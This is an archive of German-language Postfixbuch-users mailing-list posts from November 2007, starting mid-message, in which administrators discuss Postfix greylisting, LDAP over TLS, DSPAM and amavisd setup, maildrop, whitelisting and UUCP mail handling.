SUBSTRING(addresse,INSTR(addresse,"@")+1,LENGTH(addresse)); IF pos_id != '0' THEN SELECT b.dnsname INTO fromd2 FROM test AS a LEFT JOIN domains AS b ON b.id=a.tod WHERE a.id=pos_id; SELECT a.email INTO emailout FROM users AS a WHERE a.email=replace(addresse, fromd1,fromd2); END IF; END; // Das ganze ist nicht wirklich perfekt, aber vielleich ein Loesungsansatz den man Verbessern und hier Posten kann :) Gruss, Jonas From r.felber at ek-muc.de Sat Nov 17 08:07:44 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Sat, 17 Nov 2007 08:07:44 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Greylisting-Policies_verkn=FCp?= =?iso-8859-1?q?fen?= In-Reply-To: References: Message-ID: <20071117070744.GA41160@robtone.ek-muc.de> On Sat, Nov 17, 2007 at 12:25:43AM +0100, joern at bredereck.net wrote: > > Hallo, > > wie bekomme ich es hin, E-Mails an eine bestimmte Domain grundsätzlich zu greylisten, aber trotzdem bestimmte Absender im > Kontext dieses Greylistings wiederum zu whitelisten? > > Mein Setup sieht momentan so aus: > > smtpd_restriction_classes = greylist_policy > greylist_policy = check_policy_service inet:127.0.0.1:60000 > smtpd_recipient_restrictions = > check_sender_access pcre:/etc/postfix/greylist_from_enabled.pcre > check_recipient_access pcre:/etc/postfix/greylist_enabled.pcre > [...] > Oder einfacher gesagt: Wie bekomme ich es hin, dass nur dann das Target "greylist_policy" zum Tragen kommt, wenn eine > E-Mail auf beide Bedinungungen ( check_sender_access UND check_recipient_access) matched? Kann man die beiden Checks > irgendwie verschachteln? smtpd_restriction_classes = check_greylist greylist check_greylist = check_recipient_access pcre:/etc/postfix/greylist_enabled.pcre greylist = check_policy_service inet:127.0.0.1:60000 smtpd_recipient_restrictions = check_sender_access pcre:/etc/postfix/greylist_from_enabled.pcre file /etc/postfix/greylist_from_enabled.pcre sender at example.tld DUNNO sender2 at example.tld check_greylist file /etc/postfix/greylist_enabled.pcre recipient1 at domain.tld DUNNO recipient2 at domain.tld greylist -- Robert Felber (PGP: 896CF30B) Munich, Germany From r.felber at ek-muc.de Sat Nov 17 08:11:32 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Sat, 17 Nov 2007 08:11:32 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Greylisting-Policies_verkn=FCp?= =?iso-8859-1?q?fen?= In-Reply-To: <20071117070744.GA41160@robtone.ek-muc.de> References: <20071117070744.GA41160@robtone.ek-muc.de> Message-ID: <20071117071132.GB41160@robtone.ek-muc.de> On Sat, Nov 17, 2007 at 08:07:21AM +0100, Robert Felber wrote: > > file /etc/postfix/greylist_from_enabled.pcre > sender at example.tld DUNNO > sender2 at example.tld check_greylist > > > file /etc/postfix/greylist_enabled.pcre > recipient1 at domain.tld DUNNO > recipient2 at domain.tld greylist Erm, pcre. Dazu eben /pattern/ -- Robert Felber (PGP: 896CF30B) Munich, Germany From ml at awinkelmann.de Sat Nov 17 08:26:05 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Sat, 17 Nov 2007 08:26:05 +0100 Subject: [Postfixbuch-users] Postfix (Relay) LDAP | TLS Problem In-Reply-To: <473B0577.3060406@tyntec.biz> References: <473B0577.3060406@tyntec.biz> Message-ID: <200711170826.06173.ml@awinkelmann.de> On Mittwoch, 14. November 2007, Artur Mücke wrote: > Moin Leute, ich habe ein kleines Problem mit Postfix und LDAP. Ich hab > einen separaten Postfix-Server aufgesetzt, der lediglich als > Viren-Spam-Filter funktioniert und die gecheckten Mails dann an den > finalen Mailserver relayed. An welche Domains bzw. User die Mails > weitergeleitet werden sollen, fragt der Postfix über LDAP ab. Mein > Problem ist nun, dass ich die Verbindung zwischen Postfix und LDAP nicht > über TLS hinbekomme. :-/ > > Hier mal die relevanten Config-Ausschnitte: > > ####### main.cf ####################################################### > Code: > relayhost = [10.3.4.234]:25 > relay_domains = ldap:relay_domain > relay_recipient_maps = ldap:relay_recipient > > ## RELAY - DOMAINS ## > relay_domain_server_host = 10.3.5.195 > relay_domain_server_port = 389 > relay_domain_start_tls = yes > relay_domain_tls_require_cert = no > relay_domain_version = 3 > relay_domain_bind = no > relay_domain_search_base = > ou=DNSObjects,ou=AdminObjects,ou=OxObjects,dc=ldap,dc=meinedomain,dc=biz > relay_domain_query_filter = (domainName=%s) > relay_domain_result_attribute = domainName > > ## RELAY RECIPIENTS ## > relay_recipient_server_host = 10.3.5.195 > relay_recipient_server_port = 389 > relay_recipient_start_tls = yes > relay_recipient_tls_require_cert = no > relay_recipient_version = 3 > relay_recipient_bind = no > relay_recipient_search_base = > ou=Users,ou=OxObjects,dc=ldap,dc=meinedomain,dc=biz > relay_recipient_query_filter = (alias=%s) > relay_recipient_result_attribute = alias > ####################################################### > > > ####### ldap.conf ##################################################### > host 10.3.5.195 > base dc=ldap,dc=meinedomain,dc=biz > ssl start_tls > TLS_CACERTDIR /etc/ldap/cacerts > TLS_REQCERT never > slapd.conf # Auf dem OpenLDAP-Server > > # TLS > TLSCertificateFile /etc/ldap/certs/newcert.pem > TLSCertificateKeyFile /etc/ldap/certs/ldapkey.pem > TLSCACertificateFile /etc/ldap/certs/cacert.pem > TLSVerifyClient never > ####################################################### > > Mein Problem ist jetzt, dass meine config mit TLS nicht funktioniert. > Ohne TLS funzt die LDAP-Anbindung von Postfix problemlos. Sobald ich TLS > in der Postfix-Config aktiviere, funktioniert die Anbindung nicht mehr. > In den Logs erscheinen die folgenden Fehlermeldungen: > > ####################################################################### > postfix/master[3678]: warning: process /usr/lib/postfix/trivial-rewrite > pid 3689 exit status 2 > postfix/smtpd[3685]: warning: premature end-of-input on private/rewrite > socket while reading input attribute name > postfix/smtpd[3685]: warning: premature end-of-input on private/rewrite > socket while reading input attribute name > postfix/smtpd[3685]: warning: problem talking to service rewrite: Success > postfix/master[3678]: warning: process /usr/lib/postfix/trivial-rewrite > pid 3690 exit status 2 > postfix/master[3678]: warning: /usr/lib/postfix/trivial-rewrite: bad > command startup -- throttling > postfix/smtpd[3685]: warning: premature end-of-input on private/rewrite > socket while reading input attribute name > postfix/smtpd[3685]: warning: problem talking to service rewrite: Success Ist das Debian? Ausserdem sehe ich zwar smtpd und master denen auffällt dass trivial-rewrite weg ist, aber von dem Daemon selber ist nix da. Prüf das. Vielleicht bist Du im falschen Log oder Du verschweigst uns was? > ####################################################################### > > > Hab echt keine Ahnung woran das liegen könnte. Wenn ich es mit Postmap > oder ldapsearch auf der Konsole wie folgt teste, funktionert es auch > wunderbar. postmap machst Du als root? Vielleicht ein Berechtigungs oder chroot Problem? > ####################################################################### > postmap -q "domain.de" ldap:relay_domain > ldapsearch -x -ZZ > ####################################################################### > > Durch den Parameter -ZZ wird die TLS-Verbindung erzwungen, ergo kann ich > davon ausgehen, dass TLS auf dem LDAP richtig konfiguriert ist. > > Hat jemand ne Ahnung was ich bei Postfix falsch mache!? -- Andreas From Ralf.Hildebrandt at charite.de Sat Nov 17 10:12:49 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Sat, 17 Nov 2007 10:12:49 +0100 Subject: [Postfixbuch-users] =?utf-8?q?Greylisting-Policies_verkn=C3=BCpfe?= =?utf-8?q?n?= In-Reply-To: References: Message-ID: <20071117091249.GD6758@charite.de> * joern at bredereck.net : > > Hallo, > > wie bekomme ich es hin, E-Mails an eine bestimmte Domain grundsätzlich zu > greylisten, aber trotzdem bestimmte Absender im Kontext dieses Greylistings > wiederum zu whitelisten? sender at domain DUNNO domain greylist_policy -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Obviously the human brain works like a computer. Since there are no stupid computers humans can't be stupid. There are just a few running with Windows or even CE. From ml at awinkelmann.de Sat Nov 17 13:43:16 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Sat, 17 Nov 2007 13:43:16 +0100 Subject: [Postfixbuch-users] Postfix+DSPAM+Amavisd-New In-Reply-To: <473B1264.1090604@silviosiefke.de> References: <473B1264.1090604@silviosiefke.de> Message-ID: <200711171343.16572.ml@awinkelmann.de> On Mittwoch, 14. November 2007, Silvio Siefke wrote: > ich versuche gerade oben genanntes System ans laufen zu bekommen. > > 1.) Dspam 3.8.0 > ./configure --prefix=/usr/local/dspam > --with-mysql-includes=/usr/include/mysql --with-mysql-libraries=/usr/lib > --with-dspam-home=/var/amavis/dspam --with-dspam-owner=amavis > --with-dspam-group=amavis --enable-virtual-users > --enable-preferences-extension --enable-long-usernames > --enable-virtual-users --without-delivery-agent --without-quarantine-agent > --enable-daemon --enable-domain-scale > make && make install > 2.) Postfix 2.3.8, Postfixadmin > 3.) Maia Mailguard 1.0.2a > 4.) Debian Etch > > Ich habe versucht das über content_filter einzubinden, entsprechende > Einträge in der master.cf > --------------------------------------------------------------------- > smtp inet n - n - 50 smtpd > -o smtpd_proxy_filter=10024 > -o smtp_send_xforward_command=yes > -o smtpd_proxy_timeout=200s > -o smtp_use_tls=no > -o smtp_skip_quit_response=no > -o receive_override_options=no_header_body_checks > -o smtp_host_lookup=dns > -o disable_mime_output_conversion=yes > -o smtpd_client_connection_count_limit=100 > > :10025 inet n - n - 50 smtpd > > -o content_filter=lmtp:localhost:24 > -o lmtp_send_xforward_command=yes > -o lmtp_destination_concurrency_limit=5 > -o smtpd_client_restrictions= > -o smtpd_helo_restrictions= > -o smtpd_sender_restrictions= > -o smtpd_error_sleep_time=0 > -o smtpd_recipient_restrictions=permit_mynetworks,reject > -o disable_mime_output_conversion=yes > -o > receive_override_options=no_unknown_recipient_checks,no_header_body_checks > > :10026 inet n - n - 50 smtpd > > -o content_filter= > -o smtpd_client_restrictions= > -o smtpd_helo_restrictions= > -o smtpd_sender_restrictions= > -o smtpd_error_sleep_time=0 > -o smtpd_recipient_restrictions=permit_mynetworks,reject > -o receive_override_options=no_unknown_recipient_checks > -o disable_mime_output_conversion=yes > -o milter_macro_daemon_name=ORIGINATING > -o milter_default_action=accept > -o milter_protocol=3 > submission inet n - - - 50 smtpd > -o smtp_send_xforward_command=yes > -o smtpd_proxy_filter=10024 > -o smtpd_proxy_timeout=200s > -o smtp_use_tls=no > -o smtp_skip_quit_response=no > -o smtp_host_lookup=dns > --------------------------------------------------------------------- > > So erkennt aber Postfix nicht einmal die eigene Mailadressen mehr. > > Nov 14 15:02:05 m58s08 postfix/smtpd[6701]: 1E3C538607: > client=mail.gmx.net[213.165.64.20] > Nov 14 15:02:05 m58s08 postfix/cleanup[6829]: 1E3C538607: > message-id=<473B0DA3.5050209 at gmx.de> > Nov 14 15:02:05 m58s08 postfix/qmgr[6695]: 1E3C538607: > from=, size=944, nrcpt=1 (queue active) > Nov 14 15:02:05 m58s08 postfix/smtpd[6701]: disconnect from > mail.gmx.net[213.165.64.20] > Nov 14 15:02:05 m58s08 dspam[6833]: No such feature 'chained' Diese Fehlermeldung kommt nicht von Postfix. Scheint so da stimmt was mit der dspam-Konfiguration nicht. Prüf das. > Nov 14 15:02:05 m58s08 postfix/smtpd[6834]: connect from > m58s08.vlinux.de[83.151.21.74] > Nov 14 15:02:05 m58s08 postfix/smtpd[6834]: B7D3938609: > client=m58s08.vlinux.de[83.151.21.74] > Nov 14 15:02:05 m58s08 postfix/cleanup[6829]: B7D3938609: > message-id=<473B0DA3.5050209 at gmx.de> > Nov 14 15:02:05 m58s08 postfix/qmgr[6695]: B7D3938609: > from=, size=1508, nrcpt=1 (queue active) > Nov 14 15:02:05 m58s08 postfix/smtpd[6834]: disconnect from > m58s08.vlinux.de[83.151.21.74] > Nov 14 15:02:05 m58s08 amavis[4047]: (04047-06) Passed CLEAN, > [213.165.64.20] -> , Message-ID: > <473B0DA3.5050209 at gmx.de>, Hits: -0.1, 642 ms > Nov 14 15:02:05 m58s08 postfix/smtp[6830]: 1E3C538607: > to=, relay=83.151.21.74[83.151.21.74]:10024, > delay=0.76, delays=0.1/0.01/0/0.64, dsn=2.6.0, status=sent (250 2.6.0 Ok, > id=04047-06, from MTA: 250 2.0.0 Ok: queued as B7D3938609) > Nov 14 15:02:05 m58s08 postfix/qmgr[6695]: B7D3938609: removed Sonst sind hier keine Fehlermeldungen. > Ich habe den einzigen LocalHost Eintrag in der master.cf geändert in die > IP, dabei erhielt ich den nachfolgenden Logeintrag: > > Nov 14 15:16:05 m58s08 postfix/smtpd[8515]: warning: proxy 10024 rejected > "RCPT TO: ORCPT=rfc822;maia at silviosiefke.de": "504 > 5.5.4 RCPT command parameter not implemented: > ORCPT=rfc822;maia at silviosiefke.de" Das Ding welches auf 10024 lauscht ist broken. Es bietet DSN an, unterstützt es aber nicht. Was dort lauscht hast Du nicht gezeigt. Von Postfix-Seite kannst Du nur für den Weg DSN abschalten, siehe smtp_discard_ehlo_keywords. http://www.postfix.org/postconf.5.html#smtp_discard_ehlo_keywords > Nov 14 15:16:06 m58s08 postfix/smtpd[8515]: disconnect from > cerberus.renaissoft.com[24.82.114.254] > > Hat jemand Rat? -- Andreas From benjamin.fritsch at inf.tu-dresden.de Sat Nov 17 13:58:33 2007 From: benjamin.fritsch at inf.tu-dresden.de (Benjamin Fritsch) Date: Sat, 17 Nov 2007 13:58:33 +0100 Subject: [Postfixbuch-users] [OT] IMAP-Ordner verstecken Message-ID: <473EE579.2070004@inf.tu-dresden.de> Hallo liebe Postfixler, auch wenn es nicht ganz zum Thema passt, stelle ich die Frage auf der ML, da es doch recht viele Leute hier gibt deren Leben von Mailservern bestimmt wird :) Ich bin auf der Suche, nach einer Methode die Einstellungen von meinem Mailclient online zu speichern. Nun ist es ja nichts neues, dies in einem IMAP-Ordner zu machen und dies hatte ich auch vor. Nun kann ich meinem eigenen Mailclient ja sagen, dass er diesen Ordner nicht anzeigen soll, für andere Mailclients ist dies jedoch ein ganz normaler Ordner. Nach ein paar Runden mit Google bin ich auf ACLs gestoßen (Dovecot, Courier und Cyrus kommen damit klar). Über die ACL kann ich erstmal das "list"-Attribut für den Ordner entfernen. (ein "delete" gibt es bestimmt auch) In den Dokumentationen der Server habe ich immer nur die Möglichkeit gefunden, die ACL-Attribute lokal zu setzen, also vom Server direkt mit entsprechenden tools die zum Mailserver mitgeliefert werden. Nun meine Fragen: - Ist es möglich, die ACL vom Client zu setzen? (Dies für 3 verschiedene Server zu implementieren sollte weniger das Problem sein.) - Hat jemand noch anderen Ideen? :) Viele Grüße und schonmal vielen Dank für euer Feedback Benjamin Fritsch From joern at bredereck.net Sat Nov 17 14:10:44 2007 From: joern at bredereck.net (joern at bredereck.net) Date: Sat, 17 Nov 2007 14:10:44 +0100 (CET) Subject: [Postfixbuch-users] =?iso-8859-1?q?Greylisting-Policies_verkn=FCp?= =?iso-8859-1?q?fen?= In-Reply-To: <20071117070744.GA41160@robtone.ek-muc.de> References: <20071117070744.GA41160@robtone.ek-muc.de> Message-ID: Hallo Robert, On Sat, 17 Nov 2007, Robert Felber wrote: > smtpd_restriction_classes = > check_greylist > greylist > > check_greylist = > check_recipient_access pcre:/etc/postfix/greylist_enabled.pcre > > greylist = > check_policy_service inet:127.0.0.1:60000 > > > smtpd_recipient_restrictions = > check_sender_access pcre:/etc/postfix/greylist_from_enabled.pcre super, das war's! Danke vielmals! Gruß, Jörn From postfixbuch at thomas-schwenski.de Sun Nov 18 11:07:09 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Sun, 18 Nov 2007 11:07:09 +0100 Subject: [Postfixbuch-users] Spammail vom eigenen Server!? In-Reply-To: <473C09BD.1070902@linuxrocks.dyndns.org> References: <473B546C.6000509@thomas-schwenski.de> <473C09BD.1070902@linuxrocks.dyndns.org> Message-ID: <47400ECD.9040200@thomas-schwenski.de> Hallo Matthias, >> Als Client-Tool verwende ich "Messaging" von Windows Mobile 6. >> Eigentlich authentifiziert der sich auch. > > Eigentlich oder wirklich, wirklich? ;-) . Nun es ist zumindest konfiguriert und "Messaging" weiß ja nicht, dass die Empfängerdomain bei mir liegt. ;) Ich werde das noch verfifizieren. >> Wie kann ich verhindern, dass meine Mails als Spam markiert werden. > > Ergänzend zu Andres Post: > http://wiki.apache.org/spamassassin/DynablockIssues > > Da steht noch: (allerdings nur im Zusammenhang mit einem Workaround): > Note the use of your server's hostname, so that spammers cannot fake the data without knowledge of your server's header format and so on. > > Wie macht man das denn nun richtig? Unabhängig von allen Konfigurationen, die meinem Server sagen, solche Mails nicht zu taggen, muss die Lösung natürlich auch bei Mails an extern ein Tagging verhindern können. Thomas From postfixbuch at thomas-schwenski.de Sun Nov 18 11:08:48 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Sun, 18 Nov 2007 11:08:48 +0100 Subject: [Postfixbuch-users] maildrop als MDA in Postfix->Amavisd-New->Postfix->Courier-Konfiguration Message-ID: <47400F30.9050307@thomas-schwenski.de> Hallo, ich möchte meinen Server so umgestalten, dass Spam-Mails automatisch in einen bestimmten Ordner sortiert werden. Da ich Courier als IMAP-Server verwende liegt die Lösung in maildrop. Eingebunden werden muss maildrop per virtual_transport = maildrop in der /etc/postfix/main.cf und per maildrop unix - n n - - pipe flags=DROhq user=mail argv=/usr/bin/maildrop -d ${recipient} in der /etc/postfix/master.cf . Da bei mir noch amavisd-new als Content-Filter arbeitet wäre es wohl sinnvoller den virtual_mailbox-Parameter in der /etc/postfix/master.cf für den zweiten smtpd anzugeben, oder? Außerdem habe ich noch den Hinweis gefunden, dass maildrop E-Mail-Verzeichnisse nicht automatisch anlegt und man daher mit folgenden Zeilen in der /etc/courier/maildroprc arbeiten sollte um diese Funktion wieder zu bekommen: MAILDIR = "$DEFAULT" `test -d "$MAILDIR"` # check if dir exist if ($RETURNCODE != 0) { `mkdir -p $MAILDIR` # create dirs with parents `rmdir $MAILDIR` # remove dir for init `maildirmake $MAILDIR` # create maildir } Nach Studie von man mkdir, bin ich mir allerdings nicht sicher ob der der Parameter -p die entsprechenden Benutzerrechte aus meinem Virtual-Users-Backend (MySQL) berücksichtigt bzw. ob maildirmake da macht. (Bei mir hat jeder "Kunde" (NICHT jeder E-Mail-User) einen eigenen Systembenutzer um die Zugriffsrechte optimal voneinander abzugrenzen.) Weiterhin möchte ich jedem E-Mail-Nutzer die Möglichkeit geben eigene Regeln zu verwenden. Laut der Dokumentation von maildrop müssen dazu die Filterregeln in $HOME/.mailfilter abgelegt werden. Kann ich nun einfach bei den betreffenden E-Mail-Nutzern diese Datei in ihr Maildir legen und den $HOME-Eintrag in /etc/courier/authmysqlrc entsprechend auf das Maildir legen, oder wertet maildrop diese Konfiguration nicht aus? Ich möchte das gerne abgeklärt haben, ehe ich das an einem laufenden Server implementiere. Gruß & schönen Sonntag Thomas From RWeiss at bhs-corrugated.de Mon Nov 19 10:50:16 2007 From: RWeiss at bhs-corrugated.de (Ronald Weiss) Date: Mon, 19 Nov 2007 10:50:16 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting Message-ID: Hallo! Leider hab ich hier noch nichts gefunden was meine Frage vollends beantworten würde. Ich möchte ein Whitelisting für bestimmte Empfänger, bzw für bestimmte Sender(-domains) einrichten. Kann ich das dann so benutzen, oder gibts da irgendwelche Fallstricke? ( ">>" betreffende checks) smtpd_recipient_restrictions = #####hash:/etc/postfix/access reject_non_fqdn_recipient reject_non_fqdn_sender reject_unknown_sender_domain permit_mynetworks reject_unauth_destination #####check_policy_service inet:127.0.0.1:60000 check_recipient_access hash:/etc/postfix/roleaccount_exceptions >> check_recipient_access hash:/etc/postfix/recipient_whitelist >> check_sender_access hash:/etc/postfix/sender_whitelist reject_multi_recipient_bounce check_helo_access pcre:/etc/postfix/helo_checks reject_non_fqdn_hostname reject_invalid_hostname reject_rbl_client zen.spamhaus.org #####check_sender_mx_access cidr:/etc/postfix/fake_mx check_sender_access hash:/etc/postfix/common_spam_senderdomains check_sender_access regexp:/etc/postfix/common_spam_senderdomain_keywords permit merci schonmal Ronny -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From driessen at fblan.de Mon Nov 19 11:29:23 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 19 Nov 2007 11:29:23 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: References: Message-ID: <000601c82a97$0da67460$0565a8c0@uwe> Ronald Weiss schrieb: > Leider hab ich hier noch nichts gefunden was meine Frage > vollends beantworten würde. > Ich möchte ein Whitelisting für bestimmte Empfänger, bzw für > bestimmte Sender(-domains) einrichten. > > Kann ich das dann so benutzen, oder gibts da irgendwelche > Fallstricke? ( ">>" betreffende checks) > > smtpd_recipient_restrictions = > #####hash:/etc/postfix/access > reject_non_fqdn_recipient > reject_non_fqdn_sender > reject_unknown_sender_domain > permit_mynetworks > reject_unauth_destination > #####check_policy_service inet:127.0.0.1:60000 > check_recipient_access hash:/etc/postfix/roleaccount_exceptions > >> check_recipient_access hash:/etc/postfix/recipient_whitelist > >> check_sender_access hash:/etc/postfix/sender_whitelist Einsetzen kann man vieles da du aber nicht genau das warum wieso beschreibst kann man eigentlich keine Aussage treffen. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From RWeiss at bhs-corrugated.de Mon Nov 19 11:56:07 2007 From: RWeiss at bhs-corrugated.de (Ronald Weiss) Date: Mon, 19 Nov 2007 11:56:07 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: <000601c82a97$0da67460$0565a8c0@uwe> Message-ID: > Einsetzen kann man vieles da du aber nicht genau das warum wieso > beschreibst kann man > eigentlich keine Aussage treffen. Mir gehts darum: -Ich möchte einen einfachen Weg haben, um bestimmte Absender(-domains) oder aber Empfänger zu whitelisten, sodass keine weitere Prüfung nach z.B. RBLs stattfindet... (auf Zuruf des Users quasi) btw:Das ganze wird später noch auf viren gecheckt, und ggf. mit SPAM getaggt... -postfix läuft hier schon produktiv, deswegen möcht ich hier nicht mit den whitelists herumexperimentieren, und frage hier lieber vorher nach... Ronny -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From driessen at fblan.de Mon Nov 19 12:10:22 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 19 Nov 2007 12:10:22 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: References: <000601c82a97$0da67460$0565a8c0@uwe> Message-ID: <000f01c82a9c$c70ecd80$0565a8c0@uwe> Ronald Weiss schrieb: > > > Einsetzen kann man vieles da du aber nicht genau das warum wieso > > beschreibst kann man > > eigentlich keine Aussage treffen. > > > Mir gehts darum: > -Ich möchte einen einfachen Weg haben, um bestimmte > Absender(-domains) oder aber Empfänger zu whitelisten, sodass > keine weitere Prüfung nach z.B. RBLs stattfindet... > (auf Zuruf des Users quasi) > btw:Das ganze wird später noch auf viren gecheckt, und ggf. > mit SPAM getaggt... > -postfix läuft hier schon produktiv, deswegen möcht ich hier > nicht mit den whitelists herumexperimentieren, und frage hier > lieber vorher nach... > damit dann danach keine weiteren Checks durchgeführt werden muß mit @Domain.de OK bzw. user at domain.de gearbeitet werden. Kommt egal wer mit einer solchen Absenderadresse wird dieser allerdings immer durchgelassen (ob sie nun stimmt oder auch nicht) das gleiche gilt für die Empfängeradresse (egal er da an die Adresse schreibt er wird durchgelassen) Spamaufkommen wird sehr wahrscheinlich gerade bei dem whitelisten der Empfängeradresse ansteigen. Ich würde hier eher genau nachschauen warum einer abgelehnt wurde und nach anderen Möglichkeiten suchen ganz spezifisch genau diesen einen SERVER (IP/RDNS) mit dunno versehen damit der eine Test, an dem er hängenbleibt, zwar nicht durchgeführt, aber alles andere immer noch geprüft wird. OK ist nur in sehr seltenen Ausnahmefällen wirklich zu empfehlen. aber solange du dir dieser Gefahren bewust bist kannst du alles machen. evtl. bringst du mal ein Beispiel warum da einer nicht zugestellt wurde den du freischalten möchtest. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From Ralf.Hildebrandt at charite.de Mon Nov 19 12:24:40 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 19 Nov 2007 12:24:40 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: <000f01c82a9c$c70ecd80$0565a8c0@uwe> References: <000601c82a97$0da67460$0565a8c0@uwe> <000f01c82a9c$c70ecd80$0565a8c0@uwe> Message-ID: <20071119112440.GM28367@charite.de> * Uwe Driessen : > damit dann danach keine weiteren Checks durchgeführt werden muß mit > > @Domain.de OK Nein. "man 5 access" sagt domain.de OK -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de "Programming graphics in X is like finding the square root of PI using Roman numerals." -- Henry Spencer From RWeiss at bhs-corrugated.de Mon Nov 19 12:33:49 2007 From: RWeiss at bhs-corrugated.de (Ronald Weiss) Date: Mon, 19 Nov 2007 12:33:49 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: <000f01c82a9c$c70ecd80$0565a8c0@uwe> Message-ID: Danke für die schnelle Antwort erstmal! > damit dann danach keine weiteren Checks durchgeführt werden muß mit > > @Domain.de OK > > bzw. > user at domain.de gearbeitet werden. > Die Syntax der hash-files sind mir bekannt, die benutz ich ja bei den roleaccounts auch... (... btw: bei den domains müsste das @ weg, oder?) > Kommt egal wer mit einer solchen Absenderadresse wird dieser allerdings immer > durchgelassen (ob sie nun stimmt oder auch nicht) Richtig, das schmerzt mir noch bisschen im Bauch dabei... Wobei das hier "Ausnahmen" sein sollen, also folglich wird wohl keiner hier den hans at mustermann.de erraten... > das gleiche gilt für die Empfängeradresse (egal er da an die Adresse > schreibt er wird > durchgelassen) Das war die Idee... Wenn der User rosa Rüschen will, bekommt er rosa Rüschen:-D Es ist dann SEIN Spamfolder den er zu kontrollieren hat... > Spamaufkommen wird sehr wahrscheinlich gerade bei dem whitelisten > der Empfängeradresse > ansteigen. *lach* ja, das kann gut sein. Aber seitdem ich den alten exim3 von meinem Vorgänger entsorgt habe, und endlich wieder mein Postfix hab, haben sich die erkannten Spammails im Filter (der nachher kommt) von 15000-30000 am Tag auf 3000-4000 reduziert. Da fallen 100 mehr oder weniger nicht auf. > evtl. bringst du mal ein Beispiel warum da einer nicht zugestellt wurde den du > freischalten möchtest. Kann ich noch nicht :-) Aber ich warte echt täglich drauf dass einer irgendeinen Newsletter oder so vermisst... MfG Ronny -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From RWeiss at bhs-corrugated.de Mon Nov 19 12:34:57 2007 From: RWeiss at bhs-corrugated.de (Ronald Weiss) Date: Mon, 19 Nov 2007 12:34:57 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: <20071119112440.GM28367@charite.de> Message-ID: > Nein. "man 5 access" sagt > domain.de OK joa, klassisches "zu langsam getippt..." MfG Ronny -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Ralf.Hildebrandt at charite.de Mon Nov 19 12:37:22 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 19 Nov 2007 12:37:22 +0100 Subject: [Postfixbuch-users] sender und recipient whitelisting In-Reply-To: References: <000f01c82a9c$c70ecd80$0565a8c0@uwe> Message-ID: <20071119113722.GN28367@charite.de> * Ronald Weiss : > > Die Syntax der hash-files sind mir bekannt, die benutz ich ja bei den > roleaccounts auch... > (... btw: bei den domains müsste das @ weg, oder?) Korrekt. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Got a light? Typical unix response: Got: No match. From ds at marco.de Mon Nov 19 14:37:15 2007 From: ds at marco.de (Daniel Spannbauer) Date: Mon, 19 Nov 2007 14:37:15 +0100 Subject: [Postfixbuch-users] Postfix und uucp Message-ID: <4741918B.5080800@marco.de> Hallo, wir haben hier eine Sendmail-Landschaft die Mails untereinander per uucp weiterreicht. Nun habe ich Postfix zwar soweit das es mit uucp funktioniert, trotzdem gibts noch ein paar kleine Haken und Ösen. Eine davon ist die Annahme von Mails die per uucp reinkommen. Die Steuerzeile des UUCP-FIles sieht folgendermaßen aus: E D.b-fsN9ea7 D.b-fsN9ea7 ds -C D.b-fsN9ea7 0666 "" 0 rcsmtp -u ds TO xxx at b-login Das heißt das eine Mail vom User ds an xxx at b-login gehen soll. Nur leider interpretiert Postfix das "TO" als eigene Mailadresse und versucht die Mail auch an TO zuzustellen. Den User gibts aber nicht. Weiß jemand wie ich dieses verhalten abstellen kann?alias_maps = hash:/etc/postfix/postalias.gen regexp:/etc/postfix/alias.regexp biff = no canonical_maps = hash:/etc/postfix/canonical command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/lib/postfix debug_peer_level = 20 default_transport = uucp defer_transports = disable_dns_lookups = no disable_mime_output_conversion = no home_mailbox = .mail html_directory = /usr/share/doc/packages/postfix/html inet_interfaces = all inet_protocols = ipv4 local_recipient_maps = mail_owner = postfix mail_spool_directory = /var/mail mailbox_command = mailbox_size_limit = 0 mailbox_transport = mailq_path = /usr/bin/mailq manpage_directory = /usr/share/man masquerade_classes = envelope_sender, header_sender, header_recipient masquerade_domains = masquerade_exceptions = root message_size_limit = 49152000 mydestination = $myhostname, localhost.$mydomain, $mydomain, mydomain = marco.de myhostname = b-login.xxxxx mynetworks_style = subnet myorigin = $mydomain newaliases_path = /usr/bin/newaliases queue_directory = 